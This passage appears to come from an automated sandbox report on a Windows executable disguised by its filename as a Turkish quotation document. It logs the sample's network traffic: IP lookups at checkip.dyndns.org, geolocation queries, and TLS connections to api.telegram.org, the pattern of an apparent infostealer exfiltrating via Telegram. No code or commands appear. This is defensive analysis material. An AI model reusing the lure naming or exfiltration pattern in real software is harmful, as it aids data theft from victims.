Jan 9, 2025 19:10:02.114779949 CET	49713	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:02.598383904 CET	443	49715	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:02.600155115 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.600183964 CET	443	49715	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:02.735532045 CET	443	49715	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:02.735588074 CET	443	49715	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:02.735630035 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.736135006 CET	49715	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:02.740605116 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:02.745517015 CET	80	49716	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:02.745584011 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:02.745671034 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:02.750576019 CET	80	49716	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:17.307468891 CET	80	49716	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:17.329379082 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:17.334223032 CET	80	49718	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:17.335932016 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:17.336090088 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:17.340859890 CET	80	49718	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:17.364928961 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.315365076 CET	80	49718	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:21.315999031 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.317228079 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.317276955 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.317367077 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.317703009 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.317724943 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.321050882 CET	80	49716	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:21.321116924 CET	49716	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.364901066 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.810760975 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.813338041 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.813378096 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.968983889 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.969049931 CET	443	49719	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:21.969222069 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.969549894 CET	49719	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:21.973715067 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.974334955 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.978646994 CET	80	49718	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:21.978702068 CET	49718	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.979170084 CET	80	49720	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:21.979285955 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.979370117 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:21.984088898 CET	80	49720	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:26.172394991 CET	80	49720	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:26.173958063 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.174000978 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.174087048 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.174387932 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.174400091 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.224325895 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.682159901 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.683854103 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.683875084 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.833509922 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.833648920 CET	443	49721	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:26.833743095 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.834198952 CET	49721	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:26.838562965 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.838562965 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.843475103 CET	80	49722	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:26.843591928 CET	80	49720	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:26.843630075 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.843652010 CET	49720	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.844235897 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:26.849117994 CET	80	49722	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:30.695648909 CET	80	49722	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:30.700292110 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:30.705221891 CET	80	49723	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:30.705426931 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:30.705426931 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:30.710275888 CET	80	49723	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:30.739958048 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:33.669811964 CET	80	49723	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:33.670303106 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:33.671039104 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:33.671078920 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:33.671159029 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:33.671457052 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:33.671463966 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:33.675256968 CET	80	49722	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:33.675309896 CET	49722	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:33.724334002 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.283709049 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:34.285409927 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:34.285434008 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:34.566534996 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:34.566598892 CET	443	49724	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:34.566725969 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:34.567291975 CET	49724	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:34.576919079 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.577950954 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.581974030 CET	80	49723	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:34.582845926 CET	80	49725	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:34.582914114 CET	49723	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.582933903 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.583040953 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:34.587902069 CET	80	49725	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:35.527400017 CET	80	49725	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:35.528811932 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:35.528846979 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:35.528945923 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:35.529311895 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:35.529329062 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:35.568607092 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:36.004055977 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:36.053981066 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:36.163168907 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:36.163182974 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:36.281603098 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:36.281666994 CET	443	49726	104.21.96.1	192.168.2.8
Jan 9, 2025 19:10:36.281714916 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:36.283185005 CET	49726	443	192.168.2.8	104.21.96.1
Jan 9, 2025 19:10:36.395065069 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:36.396226883 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:36.396249056 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:36.396306992 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:36.396939039 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:36.396960974 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:36.399976015 CET	80	49725	132.226.247.73	192.168.2.8
Jan 9, 2025 19:10:36.400048018 CET	49725	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:37.143157005 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.143292904 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:37.144968987 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:37.144980907 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.145207882 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.147108078 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:37.191322088 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.510878086 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.510948896 CET	443	49727	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:37.511014938 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:37.511404037 CET	49727	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:43.720885038 CET	49713	80	192.168.2.8	132.226.247.73
Jan 9, 2025 19:10:43.772974968 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:43.773020029 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:43.773103952 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:43.773421049 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:43.773430109 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.379164934 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.380769968 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:44.380784988 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.380965948 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:44.380970955 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.712833881 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.712913990 CET	443	49728	149.154.167.220	192.168.2.8
Jan 9, 2025 19:10:44.712965012 CET	49728	443	192.168.2.8	149.154.167.220
Jan 9, 2025 19:10:44.724906921 CET	49728	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 19:09:57.424143076 CET	61037	53	192.168.2.8	1.1.1.1
Jan 9, 2025 19:09:57.431041002 CET	53	61037	1.1.1.1	192.168.2.8
Jan 9, 2025 19:09:58.479266882 CET	49250	53	192.168.2.8	1.1.1.1
Jan 9, 2025 19:09:58.486994028 CET	53	49250	1.1.1.1	192.168.2.8
Jan 9, 2025 19:10:36.388309956 CET	54928	53	192.168.2.8	1.1.1.1
Jan 9, 2025 19:10:36.395179987 CET	53	54928	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 19:09:57.424143076 CET	192.168.2.8	1.1.1.1	0xc137	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.479266882 CET	192.168.2.8	1.1.1.1	0xd7de	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:10:36.388309956 CET	192.168.2.8	1.1.1.1	0xf662	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:57.431041002 CET	1.1.1.1	192.168.2.8	0xc137	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:09:58.486994028 CET	1.1.1.1	192.168.2.8	0xd7de	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 19:10:36.395179987 CET	1.1.1.1	192.168.2.8	0xf662	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:09:57.460169077 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:09:58.187527895 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:09:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 19:09:58.204375029 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:09:58.418262959 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:09:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 19:09:59.405539036 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:09:59.619556904 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:09:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49713	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:00.258784056 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 9, 2025 19:10:02.072026968 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49716	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:02.745671034 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:17.307468891 CET	697	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 09 Jan 2025 18:10:17 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:17.336090088 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:21.315365076 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:21.979370117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:26.172394991 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 18:10:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49722	132.226.247.73	80	8084	C:\Users\user\Desktop\#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 19:10:26.844235897 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 9, 2025 19:10:30.695648909 CET	697	IN	HTTP/1.1 504 Gateway Time-out Date: Thu, 09 Jan 2025 18:10:30 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
